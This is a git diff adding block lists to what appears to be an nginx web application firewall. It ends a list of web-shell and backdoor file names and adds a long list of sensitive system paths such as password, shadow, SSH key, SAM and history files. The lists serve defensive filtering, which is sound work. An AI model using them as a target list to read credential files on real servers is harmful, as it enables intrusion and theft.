+wp-xmlrpc.php
+wso.php
+/wtheie.
+xccc.php
+xiaolei.php
+/xia.php
+xline7.php
+xm1rpc.ph
+xm1rpc.php
+/xmlrpc-activate.php
+xmlrpc-activate.php
+/xmlrppc.php
+xmlrppc.php
+/xnjjj.php
+xpl.php
+/xsoul.php
+/xt.txt
+/xx.php
+/ysyqq.php
+ysyqq.php
+/zaz.php
+zbi_1.php
+zbi_2.php
+zbi_3.php
+stager64
+wp-plain.php
diff --git a/nginx-waf/os_files.txt b/nginx-waf/os_files.txt
new file mode 100644
index 0000000..60cdeb4
--- /dev/null
+++ b/nginx-waf/os_files.txt
@@ -0,0 +1,1040 @@
+apache2/logs/access.log
+apache2/logs/error.log
+apache/apache2.conf
+apache/conf/httpd.conf
+apache/logs/access.log
+apache/logs/error.log
+apache/php/php.ini
+app/etc/local.xml
+.aptitude/config
+.bash_config
+.bash_history
+.bash_logout
+.bash_profile
+.bashrc
+bin/php.ini
+boot/grub/grub.cfg
+boot/grub/menu.lst
+/boot.ini
+.cache/notify-osd.log
+conf/apache2.conf
+conf/httpd.conf
+config/app.php
+config/custom.php
+config/database.php
+config_dev.yml
+config.inc.php
+.config/odesk/odesk team.conf
+/config.php
+config_prod.yml
+config_test.yml
+/configuration.php
+config.yml
+conf/jboss-minimal.xml
+conf/jboss-service.xml
+conf/jndi.properties
+/conf/log4j.xml
+/conf/login-config.xml
+/conf/server.log.properties
+/conf/standardjaws.xml
+/conf/standardjboss.xml
+.cshrc
+/default/deploy/jboss-logging.xml
+/default/log/boot.log
+.drush/
+etc/adduser.conf
+etc/alias
+etc/apache22/conf/httpd.conf
+etc/apache22/httpd.conf
+etc/apache2/apache2.conf
+etc/apache2/apache.conf
+etc/apache2/conf.d/charset
+etc/apache2/conf.d/phpmyadmin.conf
+etc/apache2/conf.d/security
+etc/apache2/conf/httpd.conf
+etc/apache2/default-server.conf
+etc/apache2/envvars
+etc/apache2/httpd2.conf
+etc/apache2/httpd.conf
+etc/apache2/mods-available/autoindex.conf
+etc/apache2/mods-available/deflate.conf
+etc/apache2/mods-available/dir.conf
+etc/apache2/mods-available/mem_cache.conf
+etc/apache2/mods-available/mime.conf
+etc/apache2/mods-available/proxy.conf
+etc/apache2/mods-available/setenvif.conf
+etc/apache2/mods-available/ssl.conf
+etc/apache2/mods-enabled/alias.conf
+etc/apache2/mods-enabled/deflate.conf
+etc/apache2/mods-enabled/dir.conf
+etc/apache2/mods-enabled/mime.conf
+etc/apache2/mods-enabled/negotiation.conf
+etc/apache2/mods-enabled/php5.conf
+etc/apache2/mods-enabled/status.conf
+etc/apache2/ports.conf
+etc/apache2/sites-available/default
+etc/apache2/sites-available/default-ssl
+etc/apache2/sites-enabled/000-default
+etc/apache2/sites-enabled/default
+etc/apache2/ssl-global.conf
+etc/apache2/vhosts.d/00_default_vhost.conf
+etc/apache2/vhosts.d/default_vhost.include
+etc/apache/access.conf
+etc/apache/apache.conf
+etc/apache/conf/httpd.conf
+etc/apache/default-server.conf
+etc/apache/httpd.conf
+etc/apt/apt.conf
+etc/avahi/avahi-daemon.conf
+etc/bash.bashrc
+etc/bash_completion.d/debconf
+etc/bluetooth/input.conf
+etc/bluetooth/main.conf
+etc/bluetooth/network.conf
+etc/bluetooth/rfcomm.conf
+etc/ca-certificates.conf
+etc/ca-certificates.conf.dpkg-old
+etc/casper.conf
+etc/chkrootkit.conf
+etc/chrootusers
+etc/clamav/clamd.conf
+etc/clamav/freshclam.conf
+etc/crontab
+etc/crypttab
+etc/cups/acroread.conf
+etc/cups/cupsd.conf
+etc/cups/cupsd.conf.default
+etc/cups/pdftops.conf
+etc/cups/printers.conf
+etc/cvs-cron.conf
+etc/cvs-pserver.conf
+etc/debconf.conf
+etc/debian_version
+etc/default/grub
+etc/deluser.conf
+etc/dhcp3/dhclient.conf
+etc/dhcp3/dhcpd.conf
+etc/dhcp/dhclient.conf
+etc/dns2tcpd.conf
+etc/e2fsck.conf
+etc/esound/esd.conf
+etc/etter.conf
+etc/exports
+etc/fedora-release
+etc/firewall.rules
+etc/foremost.conf
+etc/fstab
+etc/ftpchroot
+etc/ftphosts
+etc/ftpusers
+etc/fuse.conf
+etc/group
+etc/group-
+etc/hdparm.conf
+etc/host.conf
+etc/hostname
+etc/hosts
+etc/hosts.allow
+etc/hosts.deny
+etc/http/conf/httpd.conf
+etc/httpd/apache2.conf
+etc/httpd/apache.conf
+etc/httpd.conf
+etc/httpd/conf
+etc/httpd/conf/apache2.conf
+etc/httpd/conf/apache.conf
+etc/httpd/conf.d
+etc/httpd/conf.d/php.conf
+etc/httpd/conf.d/squirrelmail.conf
+etc/httpd/conf/httpd.conf
+etc/httpd/extra/httpd-ssl.conf
+etc/httpd/httpd.conf
+etc/httpd/logs/access.log
+etc/httpd/logs/access_log
+etc/httpd/logs/error.log
+etc/httpd/logs/error_log
+etc/httpd/mod_php.conf
+etc/httpd/php.ini
+etc/http/httpd.conf
+etc/inetd.conf
+etc/init/
+etc/init.d
+etc/inittab
+etc/ipfw.conf
+etc/ipfw.rules
+etc/issue
+etc/issue.net
+etc/kbd/config
+etc/kernel-img.conf
+etc/kernel-pkg.conf
+etc/ldap/ldap.conf
+etc/ld.so.conf
+etc/lighttpd/lighthttpd.conf
+etc/login.defs
+etc/logrotate.conf
+etc/logrotate.d/ftp
+etc/logrotate.d/proftpd
+etc/logrotate.d/vsftpd.log
+etc/ltrace.conf
+etc/mail/sendmail.conf
+etc/mandrake-release
+etc/manpath.config
+etc/miredo.conf
+etc/miredo/miredo.conf
+etc/miredo/miredo-server.conf
+etc/miredo-server.conf
+etc/modprobe.d/vmware-tools.conf
+etc/modules
+etc/mono/1.0/machine.config
+etc/mono/2.0/machine.config
+etc/mono/2.0/web.config
+etc/mono/config
+etc/motd
+etc/mtab
+etc/mtools.conf
+etc/muddleftpd.com
+etc/muddleftpd/muddleftpd.conf
+etc/muddleftpd/muddleftpd.passwd
+etc/muddleftpd/mudlog
+etc/muddleftpd/mudlogd.conf
+etc/muddleftpd/passwd
+etc/my.cnf
+etc/mysql/conf.d/old_passwords.cnf
+etc/mysql/my.cnf
+etc/network/
+etc/networks
+etc/newsyslog.conf
+etc/nginx/nginx.conf
+etc/openldap/ldap.conf
+etc/os-release
+etc/osxhttpd/osxhttpd.conf
+etc/pam.conf
+etc/pam.d/proftpd
+etc/passwd
+etc/passwd-
+etc/passwd~
+etc/password.master
+etc/php4.4/fcgi/php.ini
+etc/php4/apache2/php.ini
+etc/php4/apache/php.ini
+etc/php4/cgi/php.ini
+etc/php5/apache2/php.ini
+etc/php5/apache/php.ini
+etc/php5/cgi/php.ini
+etc/php/apache2/php.ini
+etc/php/apache/php.ini
+etc/php/cgi/php.ini
+etc/php.ini
+etc/phpmyadmin/config.inc.php
+etc/php/php4/php.ini
+etc/php/php.ini
+etc/postgresql/pg_hba.conf
+etc/postgresql/postgresql.conf
+etc/profile
+etc/proftp.conf
+etc/proftpd/modules.conf
+etc/protpd/proftpd.conf
+etc/pulse/client.conf
+etc/pure-ftpd.conf
+etc/pureftpd.passwd
+etc/pureftpd.pdb
+etc/pure-ftpd/pure-ftpd.conf
+etc/pure-ftpd/pure-ftpd.pdb
+etc/pure-ftpd/pureftpd.pdb
+etc/rc.conf
+etc/rc.d/rc.httpd
+etc/redhat-release
+etc/redis.conf
+etc/redis-sentinel.conf
+etc/resolv.conf
+etc/resolvconf/update-libc.d/sendmail
+etc/samba/dhcp.conf
+etc/samba/netlogon
+etc/samba/private/smbpasswd
+etc/samba/samba.conf
+etc/samba/smb.conf
+etc/samba/smb.conf.user
+etc/samba/smbpasswd
+etc/samba/smbusers
+etc/security/access.conf
+etc/security/environ
+etc/security/failedlogin
+etc/security/group
+etc/security/group.conf
+etc/security/lastlog
+etc/security/limits
+etc/security/limits.conf
+etc/security/namespace.conf
+etc/security/opasswd
+etc/security/pam_env.conf
+etc/security/passwd
+etc/security/sepermit.conf
+etc/security/time.conf
+etc/security/user
+etc/sensors3.conf
+etc/sensors.conf
+etc/shadow
+etc/shadow-
+etc/shadow~
+etc/slackware-release
+etc/smb.conf
+etc/smbpasswd
+etc/smi.conf
+etc/squirrelmail/apache.conf
+etc/squirrelmail/config/config.php
+etc/squirrelmail/config_default.php
+etc/squirrelmail/config_local.php
+etc/squirrelmail/config.php
+etc/squirrelmail/default_pref
+etc/squirrelmail/filters_setup.php
+etc/squirrelmail/index.php
+etc/squirrelmail/sqspell_config.php
+etc/ssh/sshd_config
+etc/sso/sso_config.ini
+etc/stunnel/stunnel.conf
+etc/subversion/config
+etc/sudoers
+etc/suse-release
+etc/sw-cp-server/applications.d/00-sso-cpserver.conf
+etc/sw-cp-server/applications.d/plesk.conf
+etc/sysconfig/network-scripts/ifcfg-eth0
+etc/sysctl.conf
+etc/sysctl.d/10-console-messages.conf
+etc/sysctl.d/10-network-security.conf
+etc/sysctl.d/10-process-security.conf
+etc/sysctl.d/wine.sysctl.conf
+etc/syslog.conf
+etc/timezone
+etc/tinyproxy/tinyproxy.conf
+etc/tor/tor-tsocks.conf
+etc/tsocks.conf
+etc/updatedb.conf
+etc/updatedb.conf.beforevmwaretoolsinstall
+etc/utmp
+etc/vhcs2/proftpd/proftpd.conf
+etc/vmware-tools/config
+etc/vmware-tools/tpvmlp.conf
+etc/vmware-tools/vmware-tools-libraries.conf
+etc/vsftpd.chroot_list
+etc/vsftpd.conf
+etc/vsftpd/vsftpd.conf
+etc/webmin/miniserv.conf
+etc/webmin/miniserv.users
+etc/wicd/dhclient.conf.template.default
+etc/wicd/manager-settings.conf
+etc/wicd/wired-settings.conf
+etc/wicd/wireless-settings.conf
+etc/wu-ftpd/ftpaccess
+etc/wu-ftpd/ftphosts
+etc/wu-ftpd/ftpusers
+etc/x11/xorg.conf
+etc/x11/xorg.conf.beforevmwaretoolsinstall
+etc/x11/xorg.conf.orig
+etc/x11/xorg.conf-vesa
+etc/x11/xorg.conf-vmware
+.gitconfig
+.gnupg/
+gruntfile.js
+home2/bin/stable/apache/php.ini
+home/bin/stable/apache/php.ini
+home/postgres/data/pg_hba.conf
+home/postgres/data/pg_ident.conf
+home/postgres/data/pg_version
+home/postgres/data/postgresql.conf
+home/user/lighttpd/lighttpd.conf
+.hplip/hplip.conf
+.htaccess
+.htdigest
+.htpasswd
+http/httpd.conf
+inc/config.php
+includes/config.php
+includes/configure.php
+inetpub/wwwroot/global.asa
+[jboss]/server/default/conf/jboss-minimal.xml
+[jboss]/server/default/conf/jboss-service.xml
+[jboss]/server/default/conf/jndi.properties
+[jboss]/server/default/conf/log4j.xml
+[jboss]/server/default/conf/login-config.xml
+[jboss]/server/default/conf/server.log.properties
+[jboss]/server/default/conf/standardjaws.xml
+[jboss]/server/default/conf/standardjboss.xml
+[jboss]/server/default/deploy/jboss-logging.xml
+[jboss]/server/default/log/boot.log
+[jboss]/server/default/log/server.log
+.ksh_history
+.lesshst
+.lftp/
+.lhistory
+library/webserver/documents/default.htm
+library/webserver/documents/default.html
+library/webserver/documents/default.php
+library/webserver/documents/index.htm
+library/webserver/documents/index.html
+library/webserver/documents/index.php
+.lldb-history
+LocalSettings.php
+.local/share/mc/
+/logs/access.log
+logs/access.log
+logs/access_log
+/logs/error.log
+logs/error.log
+logs/error_log
+logs/pure-ftpd.log
+logs/security_debug_log
+logs/security_log
+.my.cnf
+/my.cnf
+/my.ini
+/mysql-bin.index
+/mysql-bin.log
+mysql/bin/my.ini
+mysql/data/{host}.err
+mysql/data/mysql-bin.index
+mysql/data/mysql-bin.log
+mysql/data/mysql.err
+mysql/data/mysql.log
+/mysql.err
+.mysql_history
+/mysql.log
+mysql/my.cnf
+mysql/my.ini
+.nano_history
+netserver/bin/stable/apache/php.ini
+.node_repl_history
+npm-debug.log
+.nsr
+opt/apache22/conf/httpd.conf
+opt/apache2/apache2.conf
+opt/apache2/apache.conf
+opt/apache2/conf/apache2.conf
+opt/apache2/conf/apache.conf
+opt/apache2/conf/httpd.conf
+opt/apache/apache2.conf
+opt/apache/apache.conf
+opt/apache/conf/apache2.conf
+opt/apache/conf/apache.conf
+opt/apache/conf/httpd.conf
+opt/httpd/apache2.conf
+opt/httpd/apache.conf
+opt/httpd/conf/apache2.conf
+opt/httpd/conf/apache.conf
+opt/[jboss]/server/default/conf/jboss-minimal.xml
+opt/[jboss]/server/default/conf/jboss-service.xml
+opt/[jboss]/server/default/conf/jndi.properties
+opt/[jboss]/server/default/conf/log4j.xml
+opt/[jboss]/server/default/conf/login-config.xml
+opt/[jboss]/server/default/conf/server.log.properties
+opt/[jboss]/server/default/conf/standardjaws.xml
+opt/[jboss]/server/default/conf/standardjboss.xml
+opt/[jboss]/server/default/deploy/jboss-logging.xml
+opt/[jboss]/server/default/log/boot.log
+opt/[jboss]/server/default/log/server.log
+opt/lampp/etc/httpd.conf
+opt/lampp/logs/access.log
+opt/lampp/logs/access_log
+opt/lampp/logs/error.log
+opt/lampp/logs/error_log
+opt/lsws/conf/httpd_conf.xml
+opt/lsws/logs/access.log
+opt/lsws/logs/error.log
+opt/tomcat/logs/catalina.err
+opt/tomcat/logs/catalina.out
+opt/xampp/etc/php.ini
+opt/xampp/logs/access.log
+opt/xampp/logs/access_log
+opt/xampp/logs/error.log
+opt/xampp/logs/error_log
+ormconfig.json
+package.json
+package-lock.json
+parameters.yml
+.pearrc
+/pg_hba.conf
+/pg_ident.conf
+php4/php.ini
+php5/php.ini
+.php_history
+php/php.ini
+.pki/
+/polipo/polipo.conf
+/postgresql.conf
+postgresql/log/pgadmin.log
+private/etc/httpd/apache2.conf
+private/etc/httpd/apache.conf
+private/etc/httpd/httpd.conf
+private/etc/httpd/httpd.conf.default
+private/etc/squirrelmail/config/config.php
+private/tmp/[jboss]/server/default/conf/jboss-minimal.xml
+private/tmp/[jboss]/server/default/conf/jboss-service.xml
+private/tmp/[jboss]/server/default/conf/jndi.properties
+private/tmp/[jboss]/server/default/conf/log4j.xml
+private/tmp/[jboss]/server/default/conf/login-config.xml
+private/tmp/[jboss]/server/default/conf/server.log.properties
+private/tmp/[jboss]/server/default/conf/standardjaws.xml
+private/tmp/[jboss]/server/default/conf/standardjboss.xml
+private/tmp/[jboss]/server/default/deploy/jboss-logging.xml
+private/tmp/[jboss]/server/default/log/boot.log
+private/tmp/[jboss]/server/default/log/server.log
+proc/cpuinfo
+proc/devices
+proc/meminfo
+proc/net/tcp
+proc/net/udp
+proc/self/
+.psql_history
+.python_history
+.rediscli_history
+.Rhistory
+root/.bash_config
+root/.bash_history
+root/.bash_logout
+root/.bashrc
+root/.ksh_history
+root/.xauthority
+routing.yml
+security.yml
+/server/default/log/server.log
+services.yml
+sftp-config.json
+.sh_history
+sites/default/default.settings.php
+sites/default/settings.local.php
+sites/default/settings.php
+.sqlite_history
+srv/www/htdos/squirrelmail/config/config.php
+.ssh/authorized_keys
+.ssh/config
+.ssh/id_dsa
+.ssh/id_dsa.pub
+.ssh/identity
+.ssh/identity.pub
+.ssh/id_rsa
+.ssh/id_rsa.pub
+.ssh/known_hosts
+.subversion/auth
+.subversion/config
+.subversion/servers
+system32/config/default
+system32/config/sam
+system32/config/software
+system32/config/system
+system32/inetsrv/config/administration.config
+system32/inetsrv/config/applicationhost.config
+system32/inetsrv/config/redirection.config
+system/library/webobjects/adaptors/apache2.2/apache.conf
+.tconn/tconn.conf
+.tcshrc
+tmp/access.log
+tmp/[jboss]/server/default/conf/jboss-minimal.xml
+tmp/[jboss]/server/default/conf/jboss-service.xml
+tmp/[jboss]/server/default/conf/jndi.properties
+tmp/[jboss]/server/default/conf/log4j.xml
+tmp/[jboss]/server/default/conf/login-config.xml
+tmp/[jboss]/server/default/conf/server.log.properties
+tmp/[jboss]/server/default/conf/standardjaws.xml
+tmp/[jboss]/server/default/conf/standardjboss.xml
+tmp/[jboss]/server/default/deploy/jboss-logging.xml
+tmp/[jboss]/server/default/log/boot.log
+tmp/[jboss]/server/default/log/server.log
+tsconfig.json
+typo3conf/localconf.php
+usr/apache2/conf/httpd.conf
+usr/apache/conf/httpd.conf
+usr/etc/pure-ftpd.conf
+usr/home/user/lighttpd/lighttpd.conf
+usr/home/user/var/log/apache.log
+usr/home/user/var/log/lighttpd.error.log
+usr/internet/pgsql/data/pg_hba.conf
+usr/internet/pgsql/data/postmaster.log
+usr/lib/cron/log
+usr/lib/php.ini
+usr/lib/php/php.ini
+usr/lib/security/mkuser.default
+usr/local/apache1.3/conf/httpd.conf
+usr/local/apache22/conf/httpd.conf
+usr/local/apache22/httpd.conf
+usr/local/apache2/apache2.conf
+usr/local/apache2/apache.conf
+usr/local/apache2/conf/apache2.conf
+usr/local/apache2/conf/apache.conf
+usr/local/apache2/conf/extra/httpd-ssl.conf
+usr/local/apache2/conf/httpd.conf
+usr/local/apache2/conf/modsec.conf
+usr/local/apache2/conf/ssl.conf
+usr/local/apache2/conf/vhosts.conf
+usr/local/apache2/conf/vhosts-custom.conf
+usr/local/apache2/httpd.conf
+usr/local/apache2/logs/access.log
+usr/local/apache2/logs/access_log
+usr/local/apache2/logs/audit_log
+usr/local/apache2/logs/error.log
+usr/local/apache2/logs/error_log
+usr/local/apache2/logs/lighttpd.error.log
+usr/local/apache2/logs/lighttpd.log
+usr/local/apache/apache2.conf
+usr/local/apache/apache.conf
+usr/local/apache/conf/access.conf
+usr/local/apache/conf/apache2.conf
+usr/local/apache/conf/apache.conf
+usr/local/apache/conf/httpd.conf
+usr/local/apache/conf/httpd.conf.default
+usr/local/apache/conf/modsec.conf
+usr/local/apache/conf/php.ini
+usr/local/apache/conf/vhosts.conf
+usr/local/apache/conf/vhosts-custom.conf
+usr/local/apache/httpd.conf
+usr/local/apache/logs/access.log
+usr/local/apache/logs/access_log
+usr/local/apache/logs/audit_log
+usr/local/apache/logs/error.log
+usr/local/apache/logs/error_log
+usr/local/apache/logs/lighttpd.error.log
+usr/local/apache/logs/lighttpd.log
+usr/local/apache/logs/mod_jk.log
+usr/local/apps/apache22/conf/httpd.conf
+usr/local/apps/apache2/conf/httpd.conf
+usr/local/apps/apache/conf/httpd.conf
+usr/local/cpanel/logs/access_log
+usr/local/cpanel/logs/error_log
+usr/local/cpanel/logs/license_log
+usr/local/cpanel/logs/login_log
+usr/local/cpanel/logs/stats_log
+usr/local/etc/apache22/conf/httpd.conf
+usr/local/etc/apache22/httpd.conf
+usr/local/etc/apache2/conf/httpd.conf
+usr/local/etc/apache2/httpd.conf
+usr/local/etc/apache2/vhosts.conf
+usr/local/etc/apache/conf/httpd.conf
+usr/local/etc/apache/httpd.conf
+usr/local/etc/apache/vhosts.conf
+usr/local/etc/httpd/conf
+usr/local/etc/httpd/conf/httpd.conf
+usr/local/etc/lighttpd.conf
+usr/local/etc/lighttpd.conf.new
+usr/local/etc/nginx/nginx.conf
+usr/local/etc/php.ini
+usr/local/etc/pure-ftpd.conf
+usr/local/etc/pureftpd.pdb
+usr/local/etc/smb.conf
+usr/local/etc/webmin/miniserv.conf
+usr/local/etc/webmin/miniserv.users
+usr/local/httpd/conf/httpd.conf
+usr/local/jakarta/dist/tomcat/conf/context.xml
+usr/local/jakarta/dist/tomcat/conf/jakarta.conf
+usr/local/jakarta/dist/tomcat/conf/logging.properties
+usr/local/jakarta/dist/tomcat/conf/server.xml
+usr/local/jakarta/dist/tomcat/conf/workers.properties
+usr/local/jakarta/dist/tomcat/logs/mod_jk.log
+usr/local/jakarta/tomcat/conf/context.xml
+usr/local/jakarta/tomcat/conf/jakarta.conf
+usr/local/jakarta/tomcat/conf/logging.properties
+usr/local/jakarta/tomcat/conf/server.xml
+usr/local/jakarta/tomcat/conf/workers.properties
+usr/local/jakarta/tomcat/logs/catalina.err
+usr/local/jakarta/tomcat/logs/catalina.out
+usr/local/jakarta/tomcat/logs/mod_jk.log
+usr/local/[jboss]/server/default/conf/jboss-minimal.xml
+usr/local/[jboss]/server/default/conf/jboss-service.xml
+usr/local/[jboss]/server/default/conf/jndi.properties
+usr/local/[jboss]/server/default/conf/log4j.xml
+usr/local/[jboss]/server/default/conf/login-config.xml
+usr/local/[jboss]/server/default/conf/server.log.properties
+usr/local/[jboss]/server/default/conf/standardjaws.xml
+usr/local/[jboss]/server/default/conf/standardjboss.xml
+usr/local/[jboss]/server/default/deploy/jboss-logging.xml
+usr/local/[jboss]/server/default/log/boot.log
+usr/local/[jboss]/server/default/log/server.log
+usr/local/lib/php.ini
+usr/local/lighttpd/conf/lighttpd.conf
+usr/local/lighttpd/log/access.log
+usr/local/lighttpd/log/lighttpd.error.log
+usr/local/logs/access.log
+usr/local/logs/samba.log
+usr/local/lsws/conf/httpd_conf.xml
+usr/local/lsws/logs/error.log
+usr/local/mysql/data/{host}.err
+usr/local/mysql/data/mysql-bin.index
+usr/local/mysql/data/mysql-bin.log
+usr/local/mysql/data/mysqlderror.log
+usr/local/mysql/data/mysql.err
+usr/local/mysql/data/mysql.log
+usr/local/mysql/data/mysql-slow.log
+usr/local/nginx/conf/nginx.conf
+usr/local/pgsql/bin/pg_passwd
+usr/local/pgsql/data/passwd
+usr/local/pgsql/data/pg_hba.conf
+usr/local/pgsql/data/pg_log
+usr/local/pgsql/data/postgresql.conf
+usr/local/pgsql/data/postgresql.log
+usr/local/php4/apache2.conf
+usr/local/php4/apache2.conf.php
+usr/local/php4/apache.conf
+usr/local/php4/apache.conf.php
+usr/local/php4/httpd.conf
+usr/local/php4/httpd.conf.php
+usr/local/php4/lib/php.ini
+usr/local/php5/apache2.conf
+usr/local/php5/apache2.conf.php
+usr/local/php5/apache.conf
+usr/local/php5/apache.conf.php
+usr/local/php5/httpd.conf
+usr/local/php5/httpd.conf.php
+usr/local/php5/lib/php.ini
+usr/local/php/apache2.conf
+usr/local/php/apache2.conf.php
+usr/local/php/apache.conf
+usr/local/php/apache.conf.php
+usr/local/php/httpd.conf
+usr/local/php/httpd.conf.php
+usr/local/php/lib/php.ini
+usr/local/psa/admin/conf/php.ini
+usr/local/psa/admin/conf/site_isolation_settings.ini
+usr/local/psa/admin/htdocs/domains/databases/phpmyadmin/libraries/config.default.php
+usr/local/psa/admin/logs/httpsd_access_log
+usr/local/psa/admin/logs/panel.log
+usr/local/pureftpd/etc/pure-ftpd.conf
+usr/local/pureftpd/etc/pureftpd.pdb
+usr/local/pureftpd/sbin/pure-config.pl
+usr/local/samba/lib/log.user
+usr/local/samba/lib/smb.conf.user
+usr/local/sb/config
+usr/local/squirrelmail/www/readme
+usr/local/zend/etc/php.ini
+usr/local/zeus/web/global.cfg
+usr/local/zeus/web/log/errors
+usr/pkg/etc/httpd/httpd.conf
+usr/pkg/etc/httpd/httpd-default.conf
+usr/pkg/etc/httpd/httpd-vhosts.conf
+usr/pkgsrc/net/pureftpd/pure-ftpd.conf
+usr/pkgsrc/net/pureftpd/pureftpd.passwd
+usr/pkgsrc/net/pureftpd/pureftpd.pdb
+usr/ports/contrib/pure-ftpd/pure-ftpd.conf
+usr/ports/contrib/pure-ftpd/pureftpd.passwd
+usr/ports/contrib/pure-ftpd/pureftpd.pdb
+usr/ports/ftp/pure-ftpd/pure-ftpd.conf
+usr/ports/ftp/pure-ftpd/pureftpd.passwd
+usr/ports/ftp/pure-ftpd/pureftpd.pdb
+usr/ports/net/pure-ftpd/pure-ftpd.conf
+usr/ports/net/pure-ftpd/pureftpd.passwd
+usr/ports/net/pure-ftpd/pureftpd.pdb
+usr/sbin/mudlogd
+usr/sbin/mudpasswd
+usr/sbin/pure-config.pl
+usr/share/adduser/adduser.conf
+usr/share/logs/catalina.err
+usr/share/logs/catalina.out
+usr/share/squirrelmail/config/config.php
+usr/share/squirrelmail/plugins/squirrel_logger/setup.php
+usr/share/tomcat6/conf/context.xml
+usr/share/tomcat6/conf/logging.properties
+usr/share/tomcat6/conf/server.xml
+usr/share/tomcat6/conf/workers.properties
+usr/share/tomcat6/logs/catalina.err
+usr/share/tomcat6/logs/catalina.out
+usr/share/tomcat/logs/catalina.err
+usr/share/tomcat/logs/catalina.out
+usr/spool/lp/log
+usr/spool/mqueue/syslog
+var/adm/acct/sum/loginlog
+var/adm/aculog
+var/adm/aculogs
+var/adm/crash/unix
+var/adm/crash/vmcore
+var/adm/cron/log
+var/adm/dtmp
+var/adm/lastlog/username
+var/adm/log/asppp.log
+var/adm/loginlog
+var/adm/log/xferlog
+var/adm/lp/lpd-errs
+var/adm/messages
+var/adm/pacct
+var/adm/qacct
+var/adm/ras/bootlog
+var/adm/ras/errlog
+var/adm/sulog
+var/adm/syslog
+var/adm/utmp
+var/adm/utmpx
+var/adm/vold.log
+var/adm/wtmp
+var/adm/wtmpx
+var/adm/x0msgs
+var/apache/conf/httpd.conf
+var/cpanel/cpanel.config
+var/cpanel/tomcat.options
+var/cron/log
+var/data/mysql-bin.index
+var/lib/mysql/my.cnf
+var/lib/pgsql/data/postgresql.conf
+var/lib/squirrelmail/prefs/squirrelmail.log
+var/lighttpd.log
+var/local/www/conf/php.ini
+var/log/access.log
+var/log/access_log
+var/log/apache2/access.log
+var/log/apache2/access_log
+var/log/apache2/error.log
+var/log/apache2/error_log
+var/log/apache2/squirrelmail.err.log
+var/log/apache2/squirrelmail.log
+var/log/apache/access.log
+var/log/apache/access_log
+var/log/apache/error.log
+var/log/apache/error_log
+var/log/auth.log
+var/log/authlog
+var/log/boot.log
+var/log/cron/var/log/postgres.log
+var/log/daemon.log
+var/log/daemon.log.1
+var/log/data/mysql-bin.index
+var/log/error.log
+var/log/error_log
+var/log/exim/mainlog
+var/log/exim_mainlog
+var/log/exim/paniclog
+var/log/exim_paniclog
+var/log/exim/rejectlog
+var/log/exim_rejectlog
+var/log/ftplog
+var/log/ftp-proxy
+var/log/ftp-proxy/ftp-proxy.log
+var/log/httpd/access.log
+var/log/httpd/access_log
+var/log/httpd/error.log
+var/log/httpd/error_log
+var/log/ipfw
+var/log/ipfw/ipfw.log
+var/log/ipfw.log
+var/log/ipfw.today
+var/log/kern.log
+var/log/kern.log.1
+var/log/lighttpd/
+var/log/lighttpd.access.log
+var/log/lighttpd/access.log
+var/log/lighttpd/access.www.log
+var/log/lighttpd/{domain}/access.log
+var/log/lighttpd/{domain}/error.log
+var/log/lighttpd.error.log
+var/log/lighttpd/error.log
+var/log/lighttpd/error.www.log
+var/log/log.smb
+var/log/mail.err
+var/log/mail.info
+var/log/mail.log
+var/log/maillog
+var/log/mail.warn
+var/log/messages
+var/log/messages.1
+var/log/muddleftpd
+var/log/muddleftpd.conf
+var/log/mysql-bin.index
+var/log/mysql/data/mysql-bin.index
+var/log/mysqlderror.log
+var/log/mysql.err
+var/log/mysql.log
+var/log/mysql/mysql-bin.index
+var/log/mysql/mysql-bin.log
+var/log/mysql/mysql.log
+var/log/mysql/mysql-slow.log
+var/log/news.all
+var/log/news/news.all
+var/log/news/news.crit
+var/log/news/news.err
+var/log/news/news.notice
+var/log/news/suck.err
+var/log/news/suck.notice
+var/log/nginx.access_log
+var/log/nginx/access.log
+var/log/nginx/access_log
+var/log/nginx.error_log
+var/log/nginx/error.log
+var/log/nginx/error_log
+var/log/pgsql8.log
+var/log/pgsql_log
+var/log/pgsql/pgsql.log
+var/log/pm-powersave.log
+var/log/poplog
+var/log/postgres/pg_backup.log
+var/log/postgres/postgres.log
+var/log/postgresql.log
+var/log/postgresql/main.log
+var/log/postgresql/postgres.log
+var/log/postgresql/postgresql-8.1-main.log
+var/log/postgresql/postgresql-8.3-main.log
+var/log/postgresql/postgresql-8.4-main.log
+var/log/postgresql/postgresql-9.0-main.log
+var/log/postgresql/postgresql-9.1-main.log
+var/log/postgresql/postgresql.log
+var/log/proftpd
+var/log/proftpd.access_log
+var/log/proftpd.xferlog
+var/log/proftpd/xferlog.legacy
+var/log/pureftpd.log
+var/log/pure-ftpd/pure-ftpd.log
+var/logs/access.log
+var/log/samba.log
+var/log/samba.log1
+var/log/samba.log2
+var/log/samba/log.nmbd
+var/log/samba/log.smbd
+var/log/squirrelmail.log
+var/log/sso/sso.log
+var/log/sw-cp-server/error_log
+var/log/syslog
+var/log/syslog.1
+var/log/tomcat6/catalina.out
+var/log/ufw.log
+var/log/user.log
+var/log/user.log.1
+var/log/vmware/hostd-1.log
+var/log/vmware/hostd.log
+var/log/vsftpd.log
+var/log/webmin/miniserv.log
+var/log/xferlog
+var/log/xorg.0.log
+var/lp/logs/lpnet
+var/lp/logs/lpsched
+var/lp/logs/requests
+var/mail/www-data
+var/mysql-bin.index
+var/mysql.log
+var/nm2/postgresql.conf
+var/postgresql/db/postgresql.conf
+var/postgresql/log/postgresql.log
+var/saf/_log
+var/saf/port/log
+var/www/conf
+var/www/conf/httpd.conf
+var/www/html/squirrelmail-1.2.9/config/config.php
+var/www/html/squirrelmail/config/config.php
+var/www/.lighttpdpassword
+var/www/logs/access.log
+var/www/logs/access_log
+var/www/logs/error.log
+var/www/logs/error_log
+var/www/squirrelmail/config/config.php
+.vidalia/vidalia.conf
+.viminfo
+.vimrc
+volumes/macintosh_hd1/opt/apache2/conf/httpd.conf
+volumes/macintosh_hd1/opt/apache/conf/httpd.conf
+volumes/macintosh_hd1/opt/httpd/conf/httpd.conf
+volumes/macintosh_hd1/usr/local/php4/httpd.conf.php
+volumes/macintosh_hd1/usr/local/php5/httpd.conf.php
+volumes/macintosh_hd1/usr/local/php/httpd.conf.php
+volumes/macintosh_hd1/usr/local/php/lib/php.ini
+volumes/webbackup/opt/apache2/conf/httpd.conf
+volumes/webbackup/private/etc/httpd/httpd.conf
+volumes/webbackup/private/etc/httpd/httpd.conf.default
+wamp/bin/apache/apache2.2.21/conf/httpd.conf
+wamp/bin/apache/apache2.2.21/logs/access.log
+wamp/bin/apache/apache2.2.21/logs/error.log
+wamp/bin/apache/apache2.2.21/wampserver.conf
+wamp/bin/apache/apache2.2.22/conf/httpd.conf
